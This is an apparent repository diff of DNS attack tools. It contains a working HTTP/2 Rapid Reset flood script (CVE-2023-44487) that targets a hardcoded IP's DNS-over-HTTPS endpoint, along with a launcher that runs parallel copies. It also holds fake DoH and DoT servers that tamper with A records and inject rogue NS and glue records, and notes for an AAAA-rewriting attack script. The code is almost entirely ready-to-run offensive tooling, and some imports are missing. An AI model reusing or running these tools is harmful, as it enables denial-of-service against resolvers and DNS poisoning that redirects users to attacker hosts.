 import base64
 from dns.message import make_query
 import tqdm
 from h2.connection import H2Connection
 from h2.config import H2Configuration
 import h2.events
 import httpx
 import requests
 import asyncio
 import warnings
 warnings.filterwarnings("ignore")
 async def multi_h2(id_start,conn,h2_conn,host,dns_req):
    for stream_id in tqdm.tqdm(range(id_start,id_start+1000000,2)):
        #print('stream_id',stream_id)
        headers = [(':method', 'GET'), (':authority', host), (':scheme', 'https'),
                   (':path', '/dns-query' + '?dns=' + dns_req),
                   ("accept", "application/dns-message"),
                   ("content-type", "application/dns-message")]
        #print(headers)
        h2_conn.send_headers(stream_id, headers)
        conn.send(h2_conn.data_to_send())
        h2_conn.reset_stream(stream_id)
        conn.send(h2_conn.data_to_send())
 def send_rst_stream_h2(host, sid,port=443, uri_path='/dns-query', timeout=5, proxy=None):
    """
    Send an RST_STREAM frame to the given host and port.
    Parameters:
        host (str): The hostname.
        port (int): The port number.
        stream_id (int): The stream ID to reset.
        uri_path (str): The URI path for the GET request.
        timeout (int): The timeout in seconds for the socket connection.
        proxy (str): The proxy URL, if any.
    Returns:
        tuple: (status, message)
        status: 1 if successful, 0 if no response, -1 otherwise.
        message: Additional information or error message.
    """
    body = make_query(qname="baidu.com", rdtype="A", want_dnssec=False).to_wire()
    #try:
    # Create an SSL context to ignore SSL certificate verification
    ssl_context = ssl.create_default_context(purpose=ssl.Purpose.SERVER_AUTH)
    ssl_context.options |= (
            ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3 | ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
    )
    ssl_context.options |= ssl.OP_NO_COMPRESSION
    ssl_context.set_ciphers("ECDHE+AESGCM:ECDHE+CHACHA20:DHE+AESGCM:DHE+CHACHA20")
    ssl_context.set_alpn_protocols(['h2'])
    ssl_context.check_hostname = False
    ssl_context.verify_mode = ssl.CERT_NONE
    # Create a connection based on whether a proxy is used
    conn = HTTPSConnection(host, port, timeout=timeout, context=ssl_context)
    conn.connect()
    #time.sleep(2)
    # Initiate HTTP/2 connection
    config = H2Configuration(client_side=True)
    h2_conn = H2Connection(config=config)
    h2_conn.initiate_connection()
    conn.send(h2_conn.data_to_send())
    #time.sleep(2)
    # Send GET request headers
    #time.sleep(2)
    # Listen for frames and send RST_STREAM when appropriate
    #print(sid)
    flag = 0
    s_time = time.time()
    #for stream_id in tqdm.tqdm(range(sid*999999,sid*999999+1000000,2)):
    for stream_id in range(sid * 999999, sid * 999999 + 200000, 2):
        # flag += 1
        # if time.time()-s_time>1:
        #     print(flag)
        #     break
        # if flag>50:
        #     data = conn.sock.recv(65535)
        #     start_time = time.perf_counter()
        #     while time.perf_counter() - start_time < 0.1:
        #         pass
            #flag = 0
        #print('stream_id',stream_id)
        suff = base64.b64encode(str(stream_id).encode("utf-8")).decode("utf-8")+ ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(8))
        message = dns.message.make_query(f"{suff}.www.baidu.com", "A")
        message.flags |= dns.flags.RD
        dns_req = base64.b64encode(message.to_wire()).decode("UTF8").rstrip("=")
        headers = [(':method', 'GET'), (':authority', host), (':scheme', 'https'),
                   (':path', uri_path + '?dns=' + dns_req),
                   ("accept", "application/dns-message"),
                   ("content-type", "application/dns-message")]
        # headers = [(':method', 'POST'), (':authority', host), (':scheme', 'https'),
        #            (':path', uri_path),
        #            ("accept", "application/dns-message"),
        #            ("content-type", "application/dns-message")]
        #print(headers)
        h2_conn.send_headers(stream_id, headers)
        conn.send(h2_conn.data_to_send())
        # h2_conn.send_data(stream_id, body)
        # conn.send(h2_conn.data_to_send())
        h2_conn.end_stream(stream_id)
        conn.send(h2_conn.data_to_send())
        # data = conn.sock.recv(100)
        # events = h2_conn.receive_data(data)
        # print('events:\n', events)
        # start_time = time.perf_counter()
        # while time.perf_counter() - start_time < 0.05:
        #     pass
        h2_conn.reset_stream(stream_id)
        conn.send(h2_conn.data_to_send())
        #break
    conn.close()
    return ("over")
    # except Exception as e:
    #     print('error------------')
    #     return (-1, f"send_rst_stream_h2 ---- {e}")
 if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument('-s', '--sid',default=1)
    args = parser.parse_args()
    targets = ["8.218.236.77"]
    #targets = ['108.61.195.177']
    for i in targets:
        now = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        print(now,f"Checking {i}...", file=sys.stderr)
        send_rst_stream_h2(i,int(args.sid))
        #print("send rst stream:", resp, err2)
--- a/7_doh_DDoS/start_reset_att.py
+++ b/7_doh_DDoS/start_reset_att.py
@@ -0,0 +1,26 @@
 import argparse
 import os
 import time
 parser = argparse.ArgumentParser()
 parser.add_argument('-n', '--n', default=1)
 args = parser.parse_args()
 streams = [1, 3, 5, 7, 9, 11, 13, 15, 17, 19,21,23,25,27,29,31]
 for i in streams[:int(args.n)]:
    #print(f"python3 cve44487.py -s {i}")
    os.popen(f"python cve44487.py -s {i}")
 # for j in range(100):
 #     for i in streams[:int(args.n)]:
 #     #     #print(f"python3 cve44487.py -s {i}")
 #         os.popen(f"python cve44487.py -s {i}")
 #     start_time = time.perf_counter()
 #     while time.perf_counter() - start_time < 0.1:
 #         pass
 #     for i in streams[int(args.n):]:
 #         #     #print(f"python3 cve44487.py -s {i}")
 #         os.popen(f"python cve44487.py -s {i}")
 #     start_time = time.perf_counter()
 #     while time.perf_counter() - start_time < 1:
 #         pass
--- a/8_doh_fake/DoH数据篡改.pdf
+++ b/8_doh_fake/DoH数据篡改.pdf
--- a/8_doh_fake/fake_DoH.py
+++ b/8_doh_fake/fake_DoH.py
@@ -0,0 +1,63 @@
 import argparse
 import base64
 import ssl
 import dns.asyncquery
 import dns.rcode
 import aiohttp
 import dns.message
 import dns.rrset
 from aiohttp import web
 DNS_SERVER_ADDRESS = '223.5.5.5'
 DNS_SERVER_PORT = 53
 async def doh_handler(request):
    if request.method == "GET":
        rquery = str(request.query).split(' ')[1]
        #print(rquery)
        rquery = rquery.ljust(len(rquery) + len(rquery) % 4, "=")
        doh_request = dns.message.from_wire(base64.b64decode(rquery.encode("UTF8")))
    else:
        try:
            doh_request = dns.message.from_wire(await request.read())
        except :
            return web.Response(text='Invalid DNS request', status=400)
    dns_request = dns.message.make_query(doh_request.question[0].name, doh_request.question[0].rdtype)
    dns_request.id = doh_request.id
    # 发起DNS请求
    dns_response = await dns.asyncquery.udp(q = dns_request, port=DNS_SERVER_PORT, where=DNS_SERVER_ADDRESS)
    #print(dns_response)
    if str(doh_request.question[0].name) == tamper and int(doh_request.question[0].rdtype)==1:
        print('---tamper---',tamper)
        dns_response.answer = [ dns.rrset.from_text(tamper,3600,dns.rdataclass.IN, dns.rdatatype.A,'39.106.44.126')]
    if str(doh_request.question[0].name) == inject:
        print('---inject---',inject)
        dns_response.additional = [dns.rrset.from_text(inject,3600,dns.rdataclass.IN, dns.rdatatype.NS,'ns.'+inject.split('.',1)[1]),
                                   dns.rrset.from_text('ns.'+inject.split('.',1)[1],3600,dns.rdataclass.IN, dns.rdatatype.A,ns)]
    #print(dns_response)
    # 构建HTTPS响应
    response = web.Response(body=dns_response.to_wire())
    response.content_type = 'application/dns-message'
    return response
 parser = argparse.ArgumentParser()
 parser.add_argument('-tamper', '--tamper', default='')
 parser.add_argument('-inject', '--inject', default='')
 parser.add_argument('-ns', '--ns', default='39.106.44.126')
 args = parser.parse_args()
 tamper = args.tamper +'.'
 inject = args.inject +'.'
 ns = args.ns
 #print('tamper:',tamper)
 DOH_SERVER_URL = "https://dns.alidns.com/dns-query"
 CERT_FILE = "/usr/local/etc/unbound/cert_new4/app.crt"
 KEY_FILE = "/usr/local/etc/unbound/cert_new4/app.key"
 ssl_context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
 ssl_context.load_cert_chain(CERT_FILE, KEY_FILE)
 app = web.Application()
 app.router.add_get(path='/dns-query',handler=doh_handler)
 app.router.add_post(path='/dns-query',handler=doh_handler)
 web.run_app(app, host='127.0.0.1', port=8444, ssl_context=ssl_context)
--- a/9_dot_fake/DoT数据篡改.pdf
+++ b/9_dot_fake/DoT数据篡改.pdf
--- a/9_dot_fake/dot_stub.py
+++ b/9_dot_fake/dot_stub.py
@@ -0,0 +1,45 @@
 import socket
 import ssl
 import dns.message
 import dns.query
 import dns.rcode
 import argparse
 parser = argparse.ArgumentParser()
 parser.add_argument('-dot', '--dot', default='dns.alidns.com')
 args = parser.parse_args()
 print(f'DoT server: {args.dot}')
 upstream_server = '47.88.31.213'
 # 创建监听socket
 listener = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
 listener.bind(('127.0.0.1', 53))
 # 创建TLS连接
 context = ssl.create_default_context()
 context.check_hostname = False
 context.verify_mode = ssl.CERT_NONE
 while True:
        # 接收DNS请求
    data, addr = listener.recvfrom(1024)
    #print(dns.message.from_wire(data))
    data = dns.message.from_wire(data)
    if 'baidu' in data.question.__str__():
        # print(data)
        # print(addr)
        print('DNS请求：', data.question)
        # # 创建TLS连接并发送DNS请求到上游服务器
        resp = dns.query.tls(
            q=data,
            where=upstream_server,
            timeout=10,
            ssl_context=context)
        print('DNS响应：', resp.answer)
        # with socket.create_connection((upstream_server,853)) as sock:
        #     with context.wrap_socket(sock, server_hostname=upstream_server[0]) as tls_sock:
        #         tls_sock.sendall(data.to_wire())
        #         resp = tls_sock.recv(4096)
        # 将上游服务器的响应发送回客户端
        listener.sendto(resp.to_wire(), addr)
        break
--- a/9_dot_fake/fake_DoT.py
+++ b/9_dot_fake/fake_DoT.py
@@ -0,0 +1,63 @@
 import argparse
 import asyncio
 import ssl
 import socket
 import dns.asyncquery
 import dns.message
 import dns.rcode
 import dns.flags
 import dns.message
 import dns.rrset
 from dnslib import DNSRecord
 async def handle_client(reader, writer):
    request_data = await reader.read(1024)
    request =  dns.message.from_wire(request_data[2:])
    #print(request)
    dns_request = dns.message.make_query(request.question[0].name, request.question[0].rdtype)
    dns_request.id = request.id
    #print(dns_request)
    dns_response = await dns.asyncquery.udp(q=dns_request, port=53, where='223.5.5.5')
    #print(dns_response)
    if str(request.question[0].name) == tamper and int(request.question[0].rdtype) == 1:
        print('---tamper---', tamper)
        dns_response.answer = [dns.rrset.from_text(tamper, 3600, dns.rdataclass.IN, dns.rdatatype.A, '39.106.44.126')]
    if str(request.question[0].name) == inject:
        print('---inject---', inject)
        dns_response.additional = [dns.rrset.from_text(inject,3600,dns.rdataclass.IN, dns.rdatatype.NS,'ns.'+inject.split('.',1)[1]),
                                   dns.rrset.from_text('ns.'+inject.split('.',1)[1],3600,dns.rdataclass.IN, dns.rdatatype.A,ns)]
    #print(dns_response)
    response_data = dns_response
    record_header = len(response_data.to_wire()).to_bytes(2, 'big')
    # 构建完整的TLS响应数据
    tls_response_data = record_header + response_data.to_wire()
    writer.write(tls_response_data)
    await writer.drain()
    writer.close()
 async def start_server():
    # 配置服务器参数
    listen_address = '0.0.0.0'
    listen_port = 853
    CERT_FILE = "/usr/local/etc/unbound/cert_new4/app.crt"  # 替换为你的SSL证书文件路径
    KEY_FILE = "/usr/local/etc/unbound/cert_new4/app.key"  # 替换为你的SSL密钥文件路径
    context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
    context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE)
    # 创建TCP服务器
    server = await asyncio.start_server(
        handle_client, listen_address, listen_port, ssl=context)
    print(f'DoT server listening on {listen_address}:{listen_port}')
    async with server:
        await server.serve_forever()
 parser = argparse.ArgumentParser()
 parser.add_argument('-tamper', '--tamper', default='')
 parser.add_argument('-inject', '--inject', default='')
 parser.add_argument('-ns', '--ns', default='39.106.44.126')
 args = parser.parse_args()
 tamper = args.tamper +'.'
 inject = args.inject +'.'
 ns = args.ns
 asyncio.run(start_server())
--- a/test/shuchu
+++ b/test/shuchu
		`@@ -0,0 +1,3 @@`
							`## 使用说明`

							`./attack.sh 【目标解析器IP】【想要将AAAA记录修改指向的IPv6地址】【发包网口(例如eth0)】【目标域名】【目标权威服务地址】`